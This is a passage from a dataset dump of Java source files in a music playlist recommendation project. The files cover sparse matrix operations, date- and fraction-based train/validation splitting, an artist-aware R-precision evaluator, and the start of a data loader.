tokenizedP;\n\t\t}\n\t}\n\n\tprivate static final long serialVersionUID = 3800020927323228525L;\n\n\tpublic abstract void apply(final MLTextInput input);\n}\n" }, { "alpha_fraction": 0.7008466720581055, "alphanum_fraction": 0.7043744325637817, "avg_line_length": 25.742137908935547, "blob_id": "436140951e53696fef76bfa776c81d903c6917fd", "content_id": "d942d25cde948c254fcbf1e259bf728726f37f66", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4252, "license_type": "permissive", "max_line_length": 75, "num_lines": 159, "path": "/src/main/java/common/MLSparseMatrix.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package common;\n\nimport java.io.Serializable;\nimport java.util.Arrays;\nimport java.util.Map;\nimport java.util.stream.IntStream;\n\npublic interface MLSparseMatrix extends Serializable {\n\n\tpublic abstract void applyColNorm(final MLDenseVector colNorm);\n\n\tpublic abstract void applyColSelector(\n\t\t\tfinal Map<Integer, Integer> selectedColMap,\n\t\t\tfinal int nColsSelected);\n\n\tpublic abstract void applyRowNorm(final MLDenseVector rowNorm);\n\n\tpublic abstract void binarizeValues();\n\n\tpublic abstract MLSparseMatrix deepCopy();\n\n\tpublic abstract MLDenseVector getColNNZ();\n\n\tpublic abstract MLDenseVector getColNorm(final int p);\n\n\tpublic abstract MLDenseVector getColSum();\n\n\tpublic abstract int getNCols();\n\n\tpublic abstract long getNNZ();\n\n\tpublic abstract int getNRows();\n\n\tpublic abstract MLSparseVector getRow(final int rowIndex);\n\n\tpublic abstract MLSparseVector getRow(final int rowIndex,\n\t\t\tfinal boolean returnEmpty);\n\n\tpublic abstract MLDenseVector getRowNNZ();\n\n\tpublic abstract MLDenseVector getRowNorm(final int p);\n\n\tpublic abstract MLDenseVector getRowSum();\n\n\tpublic abstract boolean hasDates();\n\n\tpublic abstract void inferAndSetNCols();\n\n\tpublic abstract MLSparseMatrix mult(final MLSparseMatrix another);\n\n\tpublic abstract MLDenseVector multCol(final MLDenseVector vector);\n\n\tpublic abstract MLDenseVector multCol(final MLSparseVector vector);\n\n\tpublic abstract MLDenseVector multRow(final MLDenseVector vector);\n\n\tpublic abstract MLDenseVector multRow(final MLSparseVector vector);\n\n\tpublic abstract Map<Integer, Integer> selectCols(final int nnzCutOff);\n\n\tpublic abstract void setNCols(int nCols);\n\n\tpublic abstract void setRow(final MLSparseVector row, final int rowIndex);\n\n\tpublic abstract void toBinFile(final String outFile) throws Exception;\n\n\tpublic abstract MLSparseMatrix transpose();\n\n\tpublic static MLSparseMatrix concatHorizontal(\n\t\t\tfinal MLSparseMatrix... matrices) {\n\t\tint nRows = matrices[0].getNRows();\n\t\tint nColsNew = 0;\n\t\tfor (MLSparseMatrix matrix : matrices) {\n\t\t\tif (nRows != matrix.getNRows()) {\n\t\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\t\"input must have same number of rows\");\n\t\t\t}\n\n\t\t\tnColsNew += matrix.getNCols();\n\t\t}\n\n\t\tMLSparseVector[] concat = new MLSparseVector[nRows];\n\t\tIntStream.range(0, nRows).parallel().forEach(rowIndex -> {\n\n\t\t\tMLSparseVector[] rows = new MLSparseVector[matrices.length];\n\t\t\tboolean allNull = true;\n\t\t\tfor (int i = 0; i < matrices.length; i++) {\n\t\t\t\tMLSparseVector row = matrices[i].getRow(rowIndex);\n\t\t\t\tif (row != null) {\n\t\t\t\t\tallNull = false;\n\t\t\t\t} else {\n\t\t\t\t\t// nulls are not allowed in vector concat\n\t\t\t\t\trow = new MLSparseVector(null, null, null,\n\t\t\t\t\t\t\tmatrices[i].getNCols());\n\t\t\t\t}\n\t\t\t\trows[i] = row;\n\t\t\t}\n\t\t\tif (allNull == true) {\n\t\t\t\tconcat[rowIndex] = null;\n\t\t\t} else {\n\t\t\t\tconcat[rowIndex] = MLSparseVector.concat(rows);\n\t\t\t}\n\t\t});\n\n\t\treturn new MLSparseMatrixAOO(concat, nColsNew);\n\t}\n\n\tpublic static MLSparseMatrix concatVertical(\n\t\t\tfinal MLSparseMatrix... matrices) {\n\n\t\tint nCols = matrices[0].getNCols();\n\t\tint nRowsNew = 0;\n\t\tint[] offsets = new int[matrices.length];\n\t\tboolean[] hasDates = new boolean[] { true };\n\t\tfor (int i = 0; i < offsets.length; i++) {\n\t\t\tif (nCols != matrices[i].getNCols()) {\n\t\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\t\"input must have same number of columns\");\n\t\t\t}\n\t\t\tnRowsNew += matrices[i].getNRows();\n\t\t\toffsets[i] = nRowsNew;\n\n\t\t\tif (matrices[i].hasDates() == false) {\n\t\t\t\thasDates[0] = false;\n\t\t\t}\n\t\t}\n\n\t\tMLSparseVector[] concatRows = new MLSparseVector[nRowsNew];\n\t\tIntStream.range(0, nRowsNew).parallel().forEach(rowIndex -> {\n\n\t\t\tint offsetMatIndex = 0;\n\t\t\tint offsetRowIndex = 0;\n\t\t\tfor (int i = 0; i < offsets.length; i++) {\n\t\t\t\tif (rowIndex < offsets[i]) {\n\t\t\t\t\toffsetMatIndex = i;\n\t\t\t\t\tif (i == 0) {\n\t\t\t\t\t\toffsetRowIndex = rowIndex;\n\t\t\t\t\t} else {\n\t\t\t\t\t\toffsetRowIndex = rowIndex - offsets[i - 1];\n\t\t\t\t\t}\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tMLSparseVector row = matrices[offsetMatIndex]\n\t\t\t\t\t.getRow(offsetRowIndex);\n\t\t\tif (row != null) {\n\t\t\t\tconcatRows[rowIndex] = row.deepCopy();\n\t\t\t\tif (hasDates[0] == false) {\n\t\t\t\t\t// NOTE: if at least one matrix doesn't have dates\n\t\t\t\t\t// then all dates must be removed\n\t\t\t\t\tconcatRows[rowIndex].setDates(null);\n\t\t\t\t}\n\t\t\t}\n\t\t});\n\n\t\treturn new MLSparseMatrixAOO(concatRows, nCols);\n\t}\n}\n" }, { "alpha_fraction": 0.6531432271003723, "alphanum_fraction": 0.6571608781814575, "avg_line_length": 28.11467933654785, "blob_id": "be29b88abd8f72fad8ba4695dd0857fe49b325c8", "content_id": "f131e34dad4adfcaf4e17d1b57e9cfb4d9ba3996", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 12694, "license_type": "permissive", "max_line_length": 70, "num_lines": 436, "path": "/src/main/java/common/SplitterCF.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package common;\n\nimport java.io.Serializable;\nimport java.util.ArrayList;\nimport java.util.Arrays;\nimport java.util.Collections;\nimport java.util.HashMap;\nimport java.util.HashSet;\nimport java.util.List;\nimport java.util.Map;\nimport java.util.Random;\nimport java.util.Set;\nimport java.util.concurrent.atomic.AtomicInteger;\nimport java.util.stream.IntStream;\n\npublic class SplitterCF implements Serializable {\n\n\tprivate static final long serialVersionUID = -3182298371988867241L;\n\tprivate Map<String, MLSparseMatrix> Rstrain;\n\tprivate Map<String, MLSparseMatrix> Rsvalid;\n\tprivate int[] validRowIndexes;\n\tprivate int[] validColIndexes;\n\n\tpublic SplitterCF() {\n\n\t}\n\n\tpublic Map<String, MLSparseMatrix> getRstrain() {\n\t\treturn Rstrain;\n\t}\n\n\tpublic Map<String, MLSparseMatrix> getRsvalid() {\n\t\treturn Rsvalid;\n\t}\n\n\tpublic int[] getValidColIndexes() {\n\t\treturn validColIndexes;\n\t}\n\n\tpublic int[] getValidRowIndexes() {\n\t\treturn validRowIndexes;\n\t}\n\n\tpublic void setRstrain(Map<String, MLSparseMatrix> rstrain) {\n\t\tthis.Rstrain = rstrain;\n\t}\n\n\tpublic void setRsvalid(Map<String, MLSparseMatrix> rsvalid) {\n\t\tthis.Rsvalid = rsvalid;\n\t}\n\n\tpublic void setValidColIndexes(int[] validColIndexes) {\n\t\tthis.validColIndexes = validColIndexes;\n\t}\n\n\tpublic void setValidRowIndexes(int[] validRowIndexes) {\n\t\tthis.validRowIndexes = validRowIndexes;\n\t}\n\n\tprivate void split(final Map<String, MLSparseMatrix> Rs,\n\t\t\tfinal long dateCutOff) {\n\t\tthis.Rstrain = new HashMap<String, MLSparseMatrix>();\n\t\tthis.Rsvalid = new HashMap<String, MLSparseMatrix>();\n\n\t\tfor (Map.Entry<String, MLSparseMatrix> entry : Rs.entrySet()) {\n\t\t\tMLSparseMatrix R = entry.getValue();\n\n\t\t\tMLSparseVector[] trainRows = new MLSparseVector[R.getNRows()];\n\t\t\tMLSparseVector[] validRows = new MLSparseVector[R.getNRows()];\n\n\t\t\tAtomicInteger nnzTrain = new AtomicInteger(0);\n\t\t\tAtomicInteger nnzValid = new AtomicInteger(0);\n\t\t\tIntStream.range(0, R.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\t\tMLSparseVector row = R.getRow(rowIndex);\n\t\t\t\tif (row == null) {\n\t\t\t\t\treturn;\n\t\t\t\t}\n\t\t\t\tlong[] dates = row.getDates();\n\n\t\t\t\tint nGreater = 0;\n\t\t\t\tfor (int i = 0; i < dates.length; i++) {\n\t\t\t\t\tif (dates[i] > dateCutOff) {\n\t\t\t\t\t\tnGreater++;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tif (nGreater == dates.length) {\n\t\t\t\t\t// no training data\n\t\t\t\t\treturn;\n\t\t\t\t}\n\n\t\t\t\t// split forward in time\n\t\t\t\tint jtrain = 0;\n\t\t\t\tint[] indexesTrain = new int[dates.length - nGreater];\n\t\t\t\tfloat[] valuesTrain = new float[dates.length - nGreater];\n\t\t\t\tlong[] datesTrain = new long[dates.length - nGreater];\n\n\t\t\t\tint jvalid = 0;\n\t\t\t\tint[] indexesValid = new int[nGreater];\n\t\t\t\tfloat[] valuesValid = new float[nGreater];\n\t\t\t\tlong[] datesValid = new long[nGreater];\n\n\t\t\t\tint[] indexes = row.getIndexes();\n\t\t\t\tfloat[] values = row.getValues();\n\t\t\t\tfor (int j = 0; j < dates.length; j++) {\n\t\t\t\t\tif (dates[j] > dateCutOff) {\n\t\t\t\t\t\t// interactions after dateCutOff\n\t\t\t\t\t\tindexesValid[jvalid] = indexes[j];\n\t\t\t\t\t\tvaluesValid[jvalid] = values[j];\n\t\t\t\t\t\tdatesValid[jvalid] = dates[j];\n\t\t\t\t\t\tjvalid++;\n\n\t\t\t\t\t} else {\n\t\t\t\t\t\t// interactions before dateCutOff\n\t\t\t\t\t\tindexesTrain[jtrain] = indexes[j];\n\t\t\t\t\t\tvaluesTrain[jtrain] = values[j];\n\t\t\t\t\t\tdatesTrain[jtrain] = dates[j];\n\t\t\t\t\t\tjtrain++;\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\ttrainRows[rowIndex] = new MLSparseVector(indexesTrain,\n\t\t\t\t\t\tvaluesTrain, datesTrain, R.getNCols());\n\t\t\t\tnnzTrain.addAndGet(indexesTrain.length);\n\n\t\t\t\tif (indexesValid.length > 0) {\n\t\t\t\t\t// avoid empty rows\n\t\t\t\t\tvalidRows[rowIndex] = new MLSparseVector(indexesValid,\n\t\t\t\t\t\t\tvaluesValid, datesValid, R.getNCols());\n\t\t\t\t\tnnzValid.addAndGet(indexesValid.length);\n\t\t\t\t}\n\t\t\t});\n\n\t\t\tthis.Rstrain.put(entry.getKey(),\n\t\t\t\t\tnew MLSparseMatrixAOO(trainRows, R.getNCols()));\n\t\t\tthis.Rsvalid.put(entry.getKey(),\n\t\t\t\t\tnew MLSparseMatrixAOO(validRows, R.getNCols()));\n\t\t\tSystem.out.println(\"split() valid interaction \" + entry.getKey()\n\t\t\t\t\t+ \" nnz train:\" + nnzTrain.get() + \" nnz valid:\"\n\t\t\t\t\t+ nnzValid.get());\n\t\t}\n\t}\n\n\tpublic void splitByDate(final Map<String, MLSparseMatrix> Rs,\n\t\t\tfinal long dateCutOff) {\n\n\t\t// use all rows and all cols for validation\n\t\tint nRows = Rs.entrySet().iterator().next().getValue().getNRows();\n\t\tint nCols = Rs.entrySet().iterator().next().getValue().getNCols();\n\n\t\tsplitByDate(Rs, dateCutOff, null, nRows, nCols, false);\n\t}\n\n\tpublic void splitByDate(final Map<String, MLSparseMatrix> Rs,\n\t\t\tfinal long dateCutOff, final Set<String> interToSkip,\n\t\t\tfinal int nValidRows, final int nValidCols,\n\t\t\tfinal boolean coldStart) {\n\n\t\t// generate forward in time split\n\t\tsplit(Rs, dateCutOff);\n\n\t\t// get target row and column indices\n\t\tthis.validRowIndexes = getRowIndexes(interToSkip, nValidRows,\n\t\t\t\tthis.Rsvalid);\n\t\tthis.validColIndexes = getColIndexes(interToSkip, nValidCols,\n\t\t\t\tthis.validRowIndexes, this.Rsvalid);\n\n\t\tif (coldStart == true) {\n\t\t\t// remove selected training rows to simulate cold start\n\t\t\tfor (Map.Entry<String, MLSparseMatrix> entry : this.Rstrain\n\t\t\t\t\t.entrySet()) {\n\t\t\t\tMLSparseMatrix R = entry.getValue();\n\t\t\t\tfor (int index : this.validRowIndexes) {\n\t\t\t\t\tR.setRow(null, index);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tpublic void splitFrac(final Map<String, MLSparseMatrix> Rs,\n\t\t\tfinal float frac, final int minToSplit,\n\t\t\tfinal Set<String> interToSkip, final boolean useDate,\n\t\t\tfinal int nValidRows, final int nValidCols) {\n\t\tthis.Rstrain = new HashMap<String, MLSparseMatrix>();\n\t\tthis.Rsvalid = new HashMap<String, MLSparseMatrix>();\n\n\t\tfor (Map.Entry<String, MLSparseMatrix> entry : Rs.entrySet()) {\n\t\t\tMLSparseMatrix R = entry.getValue();\n\n\t\t\tMLSparseVector[] trainRows = new MLSparseVector[R.getNRows()];\n\t\t\tMLSparseVector[] validRows = new MLSparseVector[R.getNRows()];\n\n\t\t\tAtomicInteger nnzTrain = new AtomicInteger(0);\n\t\t\tAtomicInteger nnzValid = new AtomicInteger(0);\n\t\t\tIntStream.range(0, R.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\t\tMLSparseVector row = R.getRow(rowIndex);\n\t\t\t\tif (row == null) {\n\t\t\t\t\treturn;\n\t\t\t\t}\n\t\t\t\tint[] indexes = row.getIndexes();\n\t\t\t\tfloat[] values = row.getValues();\n\t\t\t\tlong[] dates = row.getDates();\n\n\t\t\t\tint nTotal = indexes.length;\n\t\t\t\tint nInValid = 0;\n\t\t\t\tif (nTotal < minToSplit) {\n\t\t\t\t\t// not enough to split\n\t\t\t\t\ttrainRows[rowIndex] = row.deepCopy();\n\t\t\t\t\treturn;\n\t\t\t\t}\n\n\t\t\t\tnInValid = (int) Math.ceil(frac * nTotal);\n\t\t\t\tSet<Integer> validIndexes = new HashSet<Integer>();\n\t\t\t\tif (useDate == false) {\n\t\t\t\t\t// randomly generate valid indexes\n\t\t\t\t\t// TODO: make this deterministic\n\t\t\t\t\tRandom random = new Random(rowIndex);\n\t\t\t\t\twhile (validIndexes.size() < nInValid) {\n\t\t\t\t\t\tint i = random.nextInt(nTotal);\n\t\t\t\t\t\tif (validIndexes.contains(indexes[i]) == false) {\n\t\t\t\t\t\t\tvalidIndexes.add(indexes[i]);\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\t// sort by date and take *last* frac indexes for validation\n\t\t\t\t\tMLMatrixElement[] elements = new MLMatrixElement[indexes.length];\n\t\t\t\t\tfor (int i = 0; i < indexes.length; i++) {\n\t\t\t\t\t\telements[i] = new MLMatrixElement(rowIndex, indexes[i],\n\t\t\t\t\t\t\t\tvalues[i], dates[i]);\n\t\t\t\t\t}\n\t\t\t\t\tArrays.sort(elements,\n\t\t\t\t\t\t\tnew MLMatrixElement.DateComparator(true));\n\t\t\t\t\tfor (int i = 0; i < nInValid; i++) {\n\t\t\t\t\t\tvalidIndexes.add(elements[i].getColIndex());\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\t// split using validIndexes\n\t\t\t\tint jtrain = 0;\n\t\t\t\tint[] indexesTrain = new int[nTotal - nInValid];\n\t\t\t\tfloat[] valuesTrain = new float[nTotal - nInValid];\n\t\t\t\tlong[] datesTrain = null;\n\t\t\t\tif (dates != null) {\n\t\t\t\t\tdatesTrain = new long[nTotal - nInValid];\n\t\t\t\t}\n\n\t\t\t\tint jvalid = 0;\n\t\t\t\tint[] indexesValid = new int[nInValid];\n\t\t\t\tfloat[] valuesValid = new float[nInValid];\n\t\t\t\tlong[] datesValid = null;\n\t\t\t\tif (dates != null) {\n\t\t\t\t\tdatesValid = new long[nInValid];\n\t\t\t\t}\n\n\t\t\t\tfor (int i = 0; i < dates.length; i++) {\n\t\t\t\t\tif (validIndexes.contains(indexes[i]) == true) {\n\t\t\t\t\t\tindexesValid[jvalid] = indexes[i];\n\t\t\t\t\t\tvaluesValid[jvalid] = values[i];\n\t\t\t\t\t\tif (dates != null) {\n\t\t\t\t\t\t\tdatesValid[jvalid] = dates[i];\n\t\t\t\t\t\t}\n\t\t\t\t\t\tjvalid++;\n\n\t\t\t\t\t} else {\n\t\t\t\t\t\tindexesTrain[jtrain] = indexes[i];\n\t\t\t\t\t\tvaluesTrain[jtrain] = values[i];\n\t\t\t\t\t\tif (dates != null) {\n\t\t\t\t\t\t\tdatesTrain[jtrain] = dates[i];\n\t\t\t\t\t\t}\n\t\t\t\t\t\tjtrain++;\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\ttrainRows[rowIndex] = new MLSparseVector(indexesTrain,\n\t\t\t\t\t\tvaluesTrain, datesTrain, R.getNCols());\n\t\t\t\tnnzTrain.addAndGet(indexesTrain.length);\n\n\t\t\t\tif (indexesValid.length > 0) {\n\t\t\t\t\t// avoid empty rows\n\t\t\t\t\tvalidRows[rowIndex] = new MLSparseVector(indexesValid,\n\t\t\t\t\t\t\tvaluesValid, datesValid, R.getNCols());\n\t\t\t\t\tnnzValid.addAndGet(indexesValid.length);\n\t\t\t\t}\n\t\t\t});\n\n\t\t\tthis.Rstrain.put(entry.getKey(),\n\t\t\t\t\tnew MLSparseMatrixAOO(trainRows, R.getNCols()));\n\t\t\tthis.Rsvalid.put(entry.getKey(),\n\t\t\t\t\tnew MLSparseMatrixAOO(validRows, R.getNCols()));\n\n\t\t\t// get target row and column indices\n\t\t\tthis.validRowIndexes = getRowIndexes(interToSkip, nValidRows,\n\t\t\t\t\tthis.Rsvalid);\n\t\t\tthis.validColIndexes = getColIndexes(interToSkip, nValidCols,\n\t\t\t\t\tthis.validRowIndexes, this.Rsvalid);\n\n\t\t\tSystem.out.println(\"split() valid interaction \" + entry.getKey()\n\t\t\t\t\t+ \" nnz train:\" + nnzTrain.get() + \" nnz valid:\"\n\t\t\t\t\t+ nnzValid.get());\n\t\t}\n\t}\n\n\tprivate static int[] getColIndexes(final Set<String> interToSkip,\n\t\t\tfinal int nValidCols, final int[] validRowIndexes,\n\t\t\tfinal Map<String, MLSparseMatrix> Rs) {\n\n\t\tint nCols = Rs.entrySet().iterator().next().getValue().getNCols();\n\t\tif (nValidCols > nCols) {\n\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\"nValidCols=\" + nValidCols + \" nCols=\" + nCols);\n\t\t}\n\n\t\tif (nValidCols == nCols) {\n\t\t\t// use all columns\n\t\t\tint[] validColIndexes = new int[nCols];\n\t\t\tfor (int i = 0; i < nCols; i++) {\n\t\t\t\tvalidColIndexes[i] = i;\n\t\t\t}\n\t\t\treturn validColIndexes;\n\t\t}\n\n\t\t// find all candidate column ids that appear in the valid set\n\t\tSet<Integer> validCols = null;\n\t\tfor (Map.Entry<String, MLSparseMatrix> entry : Rs.entrySet()) {\n\t\t\tif (interToSkip != null\n\t\t\t\t\t&& interToSkip.contains(entry.getKey()) == true) {\n\t\t\t\t// skip these interaction types\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tMLSparseMatrix R = entry.getValue();\n\t\t\tif (validCols == null) {\n\t\t\t\tvalidCols = new HashSet<Integer>(R.getNCols());\n\t\t\t}\n\n\t\t\tfor (int rowIndex : validRowIndexes) {\n\t\t\t\tMLSparseVector row = R.getRow(rowIndex);\n\t\t\t\tif (row == null) {\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\n\t\t\t\tfor (int colIndex : row.getIndexes()) {\n\t\t\t\t\tvalidCols.add(colIndex);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tif (validCols.size() > nValidCols) {\n\t\t\t// randomly select nValidCols\n\t\t\tList<Integer> validIndexesPerm = new ArrayList<Integer>(validCols);\n\t\t\tCollections.shuffle(validIndexesPerm, new Random(1));\n\n\t\t\tvalidCols = new HashSet<Integer>();\n\t\t\tvalidCols.addAll(validIndexesPerm.subList(0, nValidCols));\n\n\t\t} else {\n\t\t\t// backfill with random sampling\n\t\t\tint[] colIndexesRemain = new int[nCols - validCols.size()];\n\t\t\tint cur = 0;\n\t\t\tfor (int i = 0; i < nCols; i++) {\n\t\t\t\tif (validCols.contains(i) == false) {\n\t\t\t\t\tcolIndexesRemain[cur] = i;\n\t\t\t\t\tcur++;\n\t\t\t\t}\n\t\t\t}\n\t\t\tMLRandomUtils.shuffle(colIndexesRemain, new Random(1));\n\t\t\tfor (int i = 0; i < nValidCols - validCols.size(); i++) {\n\t\t\t\tvalidCols.add(colIndexesRemain[i]);\n\t\t\t}\n\t\t}\n\n\t\tint[] validColIndexes = new int[validCols.size()];\n\t\tint cur = 0;\n\t\tfor (int index : validCols) {\n\t\t\tvalidColIndexes[cur] = index;\n\t\t\tcur++;\n\t\t}\n\t\tArrays.sort(validColIndexes);\n\t\treturn validColIndexes;\n\t}\n\n\tprivate static int[] getRowIndexes(final Set<String> interToSkip,\n\t\t\tfinal int nValidRows, final Map<String, MLSparseMatrix> Rs) {\n\n\t\tint nRows = Rs.entrySet().iterator().next().getValue().getNRows();\n\t\tif (nValidRows > nRows) {\n\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\"nValidRows=\" + nValidRows + \" nRows=\" + nRows);\n\t\t}\n\n\t\tif (nValidRows == nRows) {\n\t\t\t// use all rows\n\t\t\tint[] validRowIndexes = new int[nRows];\n\t\t\tfor (int i = 0; i < nRows; i++) {\n\t\t\t\tvalidRowIndexes[i] = i;\n\t\t\t}\n\t\t\treturn validRowIndexes;\n\t\t}\n\n\t\t// get indexes of all validation rows\n\t\tSet<Integer> validRows = null;\n\t\tfor (Map.Entry<String, MLSparseMatrix> entry : Rs.entrySet()) {\n\t\t\tif (interToSkip != null\n\t\t\t\t\t&& interToSkip.contains(entry.getKey()) == true) {\n\t\t\t\t// skip these interaction types\n\t\t\t\tcontinue;\n\t\t\t}\n\n\t\t\tMLSparseMatrix R = entry.getValue();\n\t\t\tif (validRows == null) {\n\t\t\t\tvalidRows = new HashSet<Integer>(R.getNRows());\n\t\t\t}\n\n\t\t\tfor (int i = 0; i < R.getNRows(); i++) {\n\t\t\t\tif (R.getRow(i) != null) {\n\t\t\t\t\tvalidRows.add(i);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\t// shuffle all validation row indexes and select nValidRows\n\t\tif (validRows.size() > nValidRows) {\n\t\t\tList<Integer> validIndexesPerm = new ArrayList<Integer>(validRows);\n\t\t\tCollections.shuffle(validIndexesPerm, new Random(1));\n\n\t\t\tvalidRows = new HashSet<Integer>();\n\t\t\tvalidRows.addAll(validIndexesPerm.subList(0, nValidRows));\n\t\t}\n\t\tint[] validRowIndexes = new int[validRows.size()];\n\t\tint cur = 0;\n\t\tfor (int index : validRows) {\n\t\t\tvalidRowIndexes[cur] = index;\n\t\t\tcur++;\n\t\t}\n\t\tArrays.sort(validRowIndexes);\n\t\treturn validRowIndexes;\n\t}\n}\n" }, { "alpha_fraction": 0.6837324500083923, "alphanum_fraction": 0.6895127892494202, "avg_line_length": 27.83333396911621, "blob_id": "903e5e473258a7d3ff6b3cdfd64733a9992e5315", "content_id": "a4a2c6a618a9dbf7157715b6324bc14a026a6ebf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2422, "license_type": "permissive", "max_line_length": 74, "num_lines": 84, "path": "/src/main/java/common/EvaluatorRPrecisionArtist.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package common;\n\nimport java.util.Arrays;\nimport java.util.HashSet;\nimport java.util.Set;\nimport java.util.concurrent.atomic.AtomicInteger;\nimport java.util.stream.IntStream;\n\npublic class EvaluatorRPrecisionArtist extends EvaluatorCF {\n\tpublic MLSparseMatrix songArtist;\n\n\tpublic EvaluatorRPrecisionArtist(int[] evalThreshsP,\n\t\t\tMLSparseMatrix songArtist) {\n\t\tsuper(evalThreshsP);\n\t\tthis.songArtist = songArtist;\n\t}\n\n\t@Override\n\tpublic ResultCF evaluate(final SplitterCF split,\n\t\t\tfinal String interactionType, final FloatElement[][] preds) {\n\n\t\tdouble[] rPrecision = new double[] { 0.0 };\n\t\tMLSparseMatrix validMatrix = split.getRsvalid().get(interactionType);\n\t\tAtomicInteger nTotal = new AtomicInteger(0);\n\t\tint[] validRowIndexes = split.getValidRowIndexes();\n\t\tIntStream.range(0, validRowIndexes.length).parallel().forEach(index -> {\n\n\t\t\tint rowIndex = validRowIndexes[index];\n\t\t\tMLSparseVector row = validMatrix.getRow(rowIndex);\n\t\t\tFloatElement[] rowPreds = preds[rowIndex];\n\n\t\t\tif (row == null || rowPreds == null) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tnTotal.incrementAndGet();\n\n\t\t\tdouble nMatched = 0;\n\t\t\tint[] targetIndexes = row.getIndexes();\n\n\t\t\t// get indexes of all artists of the target songs\n\t\t\tSet<Integer> artistIndexes = new HashSet<Integer>();\n\t\t\tfor (int songIndex : targetIndexes) {\n\n\t\t\t\tMLSparseVector artist = songArtist.getRow(songIndex);\n\t\t\t\tif (artist == null) {\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\n\t\t\t\tfor (int artistIndex : artist.getIndexes()) {\n\t\t\t\t\tartistIndexes.add(artistIndex);\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// set of artist Indexes that's already matched, since it\n\t\t\t// only counts once\n\t\t\tSet<Integer> artistIndexes_already_matched = new HashSet<Integer>();\n\n\t\t\tfor (int i = 0; i < Math.min(targetIndexes.length,\n\t\t\t\t\trowPreds.length); i++) {\n\t\t\t\tif (Arrays.binarySearch(targetIndexes,\n\t\t\t\t\t\trowPreds[i].getIndex()) >= 0) {\n\t\t\t\t\tnMatched++;\n\t\t\t\t} else {\n\t\t\t\t\tint artistIndex = songArtist.getRow(rowPreds[i].getIndex())\n\t\t\t\t\t\t\t.getIndexes()[0];\n\n\t\t\t\t\tif (artistIndexes.contains(artistIndex)\n\t\t\t\t\t\t\t&& (!artistIndexes_already_matched\n\t\t\t\t\t\t\t\t\t.contains(artistIndex))) {\n\t\t\t\t\t\tartistIndexes_already_matched.add(artistIndex);\n\t\t\t\t\t\tnMatched = nMatched + 0.25;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tsynchronized (rPrecision) {\n\t\t\t\trPrecision[0] += nMatched\n\t\t\t\t\t\t/ Math.min(targetIndexes.length, rowPreds.length);\n\t\t\t}\n\t\t});\n\n\t\trPrecision[0] = rPrecision[0] / nTotal.get();\n\t\treturn new ResultCF(\"r-precision-artist\", rPrecision, nTotal.get());\n\t}\n}\n" }, { "alpha_fraction": 0.6437702178955078, "alphanum_fraction": 0.6493096947669983, "avg_line_length": 29.16452407836914, "blob_id": "77db624f69cb653a7e15c47d2b053c799d63d977", "content_id": "6d840ca2a979fb095fccf7719bb3c0aa0e5da298", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 11734, "license_type": "permissive", "max_line_length": 95, "num_lines": 389, "path": "/src/main/java/main/ParsedDataLoader.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package main;\n\nimport java.io.BufferedReader;\nimport java.io.FileReader;\nimport java.util.Arrays;\nimport java.util.HashMap;\nimport java.util.Map;\nimport java.util.concurrent.TimeUnit;\nimport java.util.concurrent.atomic.AtomicInteger;\n\nimport common.MLFeatureTransform;\nimport common.MLMatrixElement;\nimport common.MLSparseFeature;\nimport common.MLSparseMatrixAOO;\nimport common.MLSparseVector;\nimport common.MLTextTransform;\nimport common.MLTimer;\nimport main.ParsedData.PlaylistFeature;\nimport main.ParsedData.SongExtraInfoFeature;\nimport main.ParsedData.SongFeature;\nimport net.minidev.json.JSONArray;\nimport net.minidev.json.JSONObject;\nimport net.minidev.json.parser.JSONParser;\n\npublic class ParsedDataLoader {\n\n\tprivate Data dataLoaded;\n\tpublic ParsedData dataParsed;\n\n\tpublic ParsedDataLoader(final Data dataLoadedP) {\n\t\tthis.dataLoaded = dataLoadedP;\n\t\tthis.dataParsed = new ParsedData();\n\t}\n\n\tpublic ParsedDataLoader(final ParsedData dataParsedP) {\n\t\tthis.dataParsed = dataParsedP;\n\t}\n\n\tpublic void loadPlaylists() {\n\t\tMLTimer timer = new MLTimer(\"loadPlaylists\");\n\t\ttimer.tic();\n\n\t\tint nPlaylists = this.dataLoaded.playlists.length;\n\t\tint nSongs = this.dataLoaded.songs.length;\n\n\t\tMLSparseVector[] rows = new MLSparseVector[nPlaylists];\n\t\tthis.dataParsed.interactions = new MLSparseMatrixAOO(rows, nSongs);\n\n\t\t// init playlist feature matrices\n\t\tthis.dataParsed.playlistFeatures = new HashMap<PlaylistFeature, MLSparseFeature>();\n\t\tfor (PlaylistFeature featureName : PlaylistFeature.values()) {\n\t\t\tMLFeatureTransform[] featTransforms = new MLFeatureTransform[] {\n\t\t\t\t\tnew MLFeatureTransform.ColSelectorTransform(1_000) 